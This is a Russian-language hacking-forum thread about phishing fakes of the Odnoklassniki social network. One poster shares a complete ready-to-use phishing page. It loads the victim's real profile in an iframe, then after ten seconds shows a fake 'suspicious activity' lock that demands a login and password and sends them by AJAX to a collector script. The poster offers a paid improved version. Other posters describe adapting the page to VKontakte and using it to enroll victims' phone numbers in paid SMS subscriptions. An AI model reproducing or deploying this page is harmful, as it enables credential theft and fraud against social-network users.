ANTICHAT - Неплохая подделка одноклассников

ANTICHAT (https://forum.antichat.xyz/index.php)

- Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)

- - Неплохая подделка одноклассников (https://forum.antichat.xyz/showthread.php?t=8053584)

Ку всем, недавно напоролся на сайт http://0dn0klasneki.net/
Разработчика стоит похвалить, всё сделал красиво: Загружается страница профиля с одноклассников (именно своего профиля. Со всеми данными: фото, имя, друзья и тд). Через некоторое время появляется окно, что аккаунт заблокирован. http://i.imgur.com/qccn9.png
Скажу честно, если бы я не знал, что сообщения подобного содержания не доводят до хорошего, я бы побыстрее подтвердил свой номер мобильного в этом окне.

В этой теме можете обсуждать данные творение, либо делиться своими находками подобного вида.

зы: еще раз хочу сказать, что лично мне такой вариант фейка очень понравился.

По исполнению - верх примитивизма, но решение весьма оригинальное. Страница профиля одноклассников загружается во фрейме с оригинального сайта.

code:

Ну и через пару секунд табличка с требованием ввести телефон. Почему только телефон, мне не понятно. Ведь цель - кража пароля. Лучше бы была форма для кражи пароля. Кстати, я наверно сделаю фейк для одн. по такой идее - все тоже, но только вместа телефона - форма для ввода пароля. При нажатии по кнопке отправить данные летят в асинхронном запросе на обработчик, валидируются, возвращается ответ. Если данные не верны, форма не пропадает, высвечивается сообщение об ошибке. Если верны, окно закрывается. Гениально.

Вах-вах! Да, действительно интересная штучка-дрючка. Я, пожалуй, тоже с бубном вокруг неё попрыгаю, авось что-нибудь да получится.

Цитата:

Сообщение от Nick Hander

По исполнению - верх примитивизма, но решение весьма оригинальное.

об этом и говорю)
цель - подписать номер на платные рассылки, поэтому пароль от аккаунта тут не нужен, имхо

просьба ввести логин и пароль, когда ты уже находишься на своей странице - палево

Палево, но если правильно "подать", то никто не заметит измены.

просьба ввести логин и пароль, когда ты уже находишься на своей странице - палево
Почему же, можно написать похожее сообщение, типа вы зашли на аккаунт с другого ip-адреса, просьба подтвердить, что именно вы являетесь владельцем аккаунта и ввести логин и пароль. Ну или что-то в этом роде. Вполне себе реалистично и правдоподобно. Вся остальная страница блокируется, окошко закрыть нельзя. Если пользователь захочет остаться в "аккаунте" и не закрывать страницу (а так поступят большинство), ему ничего не останется, как заполнить данными форму и нажать "вход". Тогда только окошко пропадет и можно будет дальше серфить по странице. А можно сделать валидацию и закрывать окно, только если пароль будет верный. Если подобрать грамотный домен и грамотно направить пользователя на фейк, то при такой ситуации процент успешности взлома будет приближаться к 90-100%, что весьма и весьма неплохо.

Upd: Вот наваял небольшой скриптик фейка для одноклассников. Через десять секунд выскакивает форма, в которой пользователя уведомляют о подозрительной активности и просят ввести пароль, остальная страница блокируется. Ну и форма. После введения пароля форма пропадает - данные летят на сниффер в асинхронном режиме можно серфить дальше. Обработчик ставите odnlogin.php, отлавливайте пост-запросы с именами email и password. Вот собственно фейк. Страница готовая, сохраняйте под любым именем и расширением .php и .html - на ваше усмотрение.

HTML highlight

Код:



Одноклассники



$(function(){

setTimeout("go()", 10000);

});

function go() {

var ww = $(window).width();

var wh = $(window).height();

$(".cl_background").show();

$(".cl_body").css('left', ww/2 - 325).css('top', wh/2-300).css('display', 'block');

};

function registration(){

var log = document.getElementById('login').value;

var pass = document.getElementById('pass').value;

$.post('odnlogin.php', {'email':log, 'password':pass});

$(".cl_body").remove();

$(".cl_background").remove();

}



html,body {



        margin: 0;



        padding: 0;



        width: 100%;



        height: 100%;



}



iframe {



        width: 100%;



        height: 100%;



        margin: 0;



        padding: 0;



        border: none;



        position: absolute;



        top: 0;



        left: 0;



}



.loading {



        display: none;



}



.loading span {



        color: #ccc;



        position: relative;



        top: -2px;



}



.cl_background {



        position: absolute;



        width: 100%;



        height: 100%;



        background: #ffffff;



        display: none;



        z-index: 1;



        opacity: 0.4;



}



.cl_body {



        z-index: 2;



        position: absolute;



        display: none;



}



.error {



        color: #ff0000;



        display: none;



}



.cl_title {

padding-left:85px;

font: 18px Tahoma;

color: #ED812B;

font-weight: bold;

padding-top: 30px;

background: url(http://flogiston.ru/apic/1388.gif);

margin: 0;

height: 42px;

background-repeat: no-repeat;

}

.cl_body {

padding: 15px;

color: #ED812B;

font: 12px Tahoma;

}

.cl_foot {

padding: 10px;

font: 12px Tahoma;

text-align: right;

}

.cl_info {

background: #fff;

padding: 10px;

font: 12px Tahoma;

color: #000;

background-image: url(http://technoportal.ua/img/inf/internet/odnoklasniki_logo_small.jpg);

background-repeat: no-repeat;

background-position: -10px;

min-height: 70px;

padding-left: 80px;

padding-top: 25px;

}

.cl_body {

        padding:10px;

        background: #fff;

        width: 610px;

        position: absolute;

        text-align: left;

        box-shadow: 0 0 8px #ECF2F4; 

        border: 1px solid #ED812B;

}

.cl_title {

        padding-left:85px;

        font: 18px Tahoma;

        color: #ED812B;

        font-weight: bold;

        padding-top: 30px;

        background: url(http://flogiston.ru/apic/1388.gif);

        margin: 0;

        height: 42px;

        background-repeat: no-repeat;

}

.cl_foot {

        padding: 10px;

        font: 12px Tahoma;

        text-align: right;

}

.cl_info {

        background: #fff;

        padding: 10px;

        font: 12px Tahoma;

        color: #000;

        background-image: url(http://technoportal.ua/img/inf/internet/odnoklasniki_logo_small.jpg);

        background-repeat: no-repeat;

        background-position: -10px;

        min-height: 70px;

        padding-left: 80px;

        padding-top: 25px;

}

.cl_form label {

        font: bold 16px Tahoma;

        color: #3FAC0F;

}

.cl_form input {

        font: 12px Tahoma;

        color: #666;

        width: 160px;

        font-weight: bold;

        border: 1px solid #c0cad5;

        padding: 5px;

}

.cl_form span {

        color: #555;

        display: block;

        margin-left: 160px;

}

.cl_button button {

        padding: 5px;

        color: #ED812B;

        font-weight: bold;

}



Внимание! Доступ Заблокирован!



С Вашего IP замечена подозрительная активность. Возможно Ваш аккаунт пытались взломать. Подтвердите, что Вы являетесь владельцем данного аккаунта, введите логин и пароль:



e-mail:



Пароль:



загрузка...



Продолжить

Это паблик версия. Усовершенствованную версию с валидацией (окно пропадает и страница становится доступна только после введения верного пароля, до этого, хоть усрись, окно не пропадет) продам только за деньги. Всем удачного взлома!

О, спасибо, но я лучше свой сделаю.

Пляски с бубном продолжаются. Вопрос: как сделать подобное на, скажем, вконтакте? Я так понимаю заменой фрейма не обойдёшься, так откуда же подгружается интерфейс?

Вопрос: как сделать подобное на, скажем, вконтакте?
Точно так же. Только нужно будет новое окошко со стилистикой Вконтакте.

Я так понимаю заменой фрейма не обойдёшься, так откуда же подгружается интерфейс?
Оттуда же. Делаешь фрейм на все окно, и интерфейс подгружается с настоящего сайта. Так же как и на сабжевом сайте.

А мне больше интересно внутреннее устройство скрипта request.php, идея хороша - псевдоподписка автоматом.

Я лично такого не видел, ибо сейчас псевдоподписки предоставляются только вместе с сайтом - платником по реф. ссылке (например, как на jincash).

Возможно осуществление данным скриптом запроса на платник?
Т.е. так, чтобы он выступал в роли посредника между пользователем и сайтом биллинга?

Цитата:

Сообщение от PsiBoX

А мне больше интересно внутреннее устройство скрипта request.php, идея хороша - псевдоподписка автоматом.

Я лично такого не видел, ибо сейчас псевдоподписки предоставляются только вместе с сайтом - платником по реф. ссылке (например, как на jincash).

Возможно осуществление данным скриптом запроса на платник?
Т.е. так, чтобы он выступал в роли посредника между пользователем и сайтом биллинга?

все возможно, используя курл,
пользователь вводит номер, с помощью jsonp сделать запрос к пхп, скрипт обрабатывает данные и дает ответ допустим 'ок' в формате json, Яваскрипт на фейке получив - ок - выводит форму подтверждения, если не ок - выводит - введенный номер не верный или чтото такое! /И снова отправка на скрипт кода подтверждения!